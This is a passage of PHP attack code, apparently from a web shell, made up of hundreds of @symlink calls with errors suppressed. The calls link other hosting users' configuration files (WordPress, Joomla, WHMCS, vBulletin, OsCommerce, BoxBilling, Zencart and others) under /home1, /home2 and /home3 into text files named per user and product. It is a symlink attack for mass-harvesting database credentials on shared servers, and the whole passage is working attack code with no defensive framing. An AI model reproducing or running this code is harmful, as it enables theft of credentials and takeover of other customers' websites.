  1594. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1595. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1596. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1597. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1598. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1599. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1600. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1601. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1602. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1603. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1604. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1605. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1606. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1607. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1608. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1609. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1610. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1611. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1612. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1613.  
  1614. //Home2
  1615.  
  1616. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1617. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1618. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1619. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1620. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1621. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1622. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1623. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1624. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1625. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1626. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1627. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1628. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1629. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1630. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1631. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1632. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1633. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1634. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1635. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1636. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1637. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1638. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1639. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1640. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1641. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1642. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1643. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1644. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1645. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1646. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1647. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1648. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1649. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1650. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1651. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1652. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1653. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1654. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1655. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1656. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1657. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1658. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1659. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1660. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1661. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1662. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1663. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1664. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1665. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1666. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1667. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1668. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1669. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1670. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1671. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1672. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1673. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1674. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1675. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1676. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1677. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1678. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1679. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1680. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1681. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1682. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1683. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1684. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1685. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1686. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1687. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1688. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1689. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1690. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1691. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1692. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1693. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1694. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1695. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1696. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1697. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1698. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1699. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1700. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1701. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1702. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1703. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1704. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1705. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1706. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1707. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1708. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1709. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1710. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1711. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1712. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1713. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1714. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1715. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1716. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1717. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1718. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1719. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1720. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1721. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1722. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1723. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1724. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1725. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1726. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1727. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1728. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1729. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1730. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1731. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1732. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1733. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1734. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1755. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1756. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1757. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1758. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1759. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1760. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1761. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1762. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1763. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1764. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1765. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1766. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1767. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1768. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1769. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1770. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1771. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1772. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1773. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1774. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1775. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1776. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1777. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1778. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1779. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1780. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1781. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1782. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1783. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1784. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1785. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1786. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1787. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1788. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1789. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1790. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1791. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1792. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1793. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1794. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1795. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1796.  
  1797. //Home3
  1798.  
  1799. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1800. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1801. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1802. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1803. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1804. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1805. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1806. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1807. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1808. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1809. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1810. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1811. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1812. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1813. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1814. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1815. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1816. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1817. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1818. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1819. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1820. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1821. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1822. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1823. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1824. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1825. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1826. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1827. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1828. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1829. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1830. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1831. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1832. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1833. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1834. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1835. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1836. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1837. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1838. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1839. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1840. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1841. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1842. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1843. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1844. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1845. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1846. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1847. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1848. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1849. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1850. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1851. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1852. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1853. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1854. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1855. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1856. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1857. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1858. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1859. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1860. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1861. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1862. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1863. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1864. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1865. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1866. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1867. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1868. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1869. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1870. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1871. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1872. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1873. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1874. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1875. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1876. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1877. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1878. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1879. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1880. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1881. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1882. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1883. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1884. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1885. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1886. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1887. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1888. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1889. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1890. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1891. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1892. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1893. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1894. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1895. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1896. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1897. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1898. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1899. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1900. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1901. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
